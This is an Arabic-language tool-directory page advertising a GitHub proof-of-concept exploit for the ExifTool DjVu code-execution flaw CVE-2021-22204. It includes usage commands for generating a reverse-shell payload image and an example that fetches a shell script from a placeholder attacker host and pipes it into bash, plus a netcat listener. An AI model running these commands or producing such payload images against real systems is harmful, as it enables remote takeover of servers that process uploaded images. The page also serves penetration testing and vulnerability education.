Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-22204 — استغلال لثغرة تنفيذ التعليمات البرمجية عن بُعد في ExifTool (CVE-2021-22204) - نسخة محسّنة، بدون اعتماد على exiftool | Kitploit
أدوات/GitHubGitHub/d4ytox/cve-2021-22204
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubd4ytox/cve-2021-22204

CVE-2021-22204

استغلال لثغرة تنفيذ التعليمات البرمجية عن بُعد في ExifTool (CVE-2021-22204) - نسخة محسّنة، بدون اعتماد على exiftool

عرض المستودع
10منذ 18 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-22204 - تنفيذ تعسفي للكود في ExifTool

إثبات مفهوم مطوّر لثغرة CVE-2021-22204، وهي ثغرة في إصدارات ExifTool من 7.44 حتى 12.23 تسمح بتنفيذ تعسفي للكود عند معالجة ملفات DjVu الخبيثة.

الإسناد

هذا عمل مشتق. الثغرة والاستغلال الأصلي ليسا من ابتكاري.

الدورالمسؤول
مكتشف الثغرةWilliam Bowling (@wcbowling)، أُبلغت عبر برنامج مكافآت الثغرات في GitLab — أبريل 2021
إثبات المفهوم الأصليUNICORD (NicPWNs & Dev-Yeoj)
التعديلات في هذا المستودعd4ytox

الوصف

يسمح التحييد غير السليم لبيانات المستخدم في تنسيق ملف DjVu في إصدارات ExifTool من 7.44 إلى 12.23 بتنفيذ تعسفي للكود عند تحليل صورة خبيثة. يولّد هذا الاستغلال ملف صورة خبيثًا، عند معالجته بواسطة إصدار ExifTool معرّض للثغرة، ينفّذ كودًا يتحكم به المهاجم.

ما الذي تغيّره هذه النسخة

بناءً على UNICORDev/exploit-CVE-2021-22204:

  • لا اعتماد على ExifTool في جهاز المهاجم - يستخدم الأصل exiftool -config لتضمين الحمولة، وهو يفشل إذا كان ExifTool لديك مُصَلَّحًا (الإصدار 12.24+). تبني هذه النسخة حمولة DjVu نقية باستخدام djvumake فقط.
  • تعمل على Kali الحديثة - متوافقة مع Python 3.12+ (إصلاح تحذير تسلسل الهروب \c)
  • تبعيات ضئيلة - تتطلب حزمة djvulibre-bin فقط
  • كود نظيف وموجز - بدون فن ASCII أو تأخيرات مصطنعة

هذه تغييرات هندسية على استغلال قائم. لا يُدّعى أي بحث في الثغرات.

المتطلبات

root@kitploit:~
sudo apt install djvulibre-bin

الاستخدام

صدفة عكسية:

root@kitploit:~
python3 exploit.py -s <LHOST> <LPORT>

أمر مخصص:

root@kitploit:~
python3 exploit.py -c "id > /tmp/pwned"

أمثلة:

root@kitploit:~
# توليد حمولة صدفة عكسية
python3 exploit.py -s 192.168.1.100 4444

# توليد حمولة تنفيذ أمر  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# تشغيل مستمع وانتظار الاتصال
nc -nlvp 4444

يولّد الاستغلال ملف image.jpg - ارفعه إلى هدف حيث سيعالجه ExifTool.

الإصدارات المتأثرة

  • ExifTool 7.44 - 12.23

المراجع

  • إدخال NVD - CVE-2021-22204
  • التقرير الأصلي بواسطة William Bowling - HackerOne #1154542
  • نشرة ExifTool الأمنية
  • التزام تصحيح ExifTool
  • إثبات المفهوم الأصلي - UNICORDev/exploit-CVE-2021-22204

إخلاء مسؤولية

تُقدَّم هذه الأداة لأغراض تعليمية ولاختبارات الأمان المصرّح بها فقط.

المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. استخدم هذا الاستغلال فقط ضد أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها.

الوصول غير المصرّح به إلى أنظمة الحاسوب غير قانوني ويعاقب عليه القانون. استخدم بمسؤولية.

الترخيص

MIT، ينطبق فقط على التعديلات في هذا المستودع. إثبات المفهوم العلوي لا يحمل ترخيصًا، لذا تبقى جميع الحقوق محفوظة لمؤلفيه. راجع LICENSE لإشعار الإسناد الكامل.

تنزيل الأداة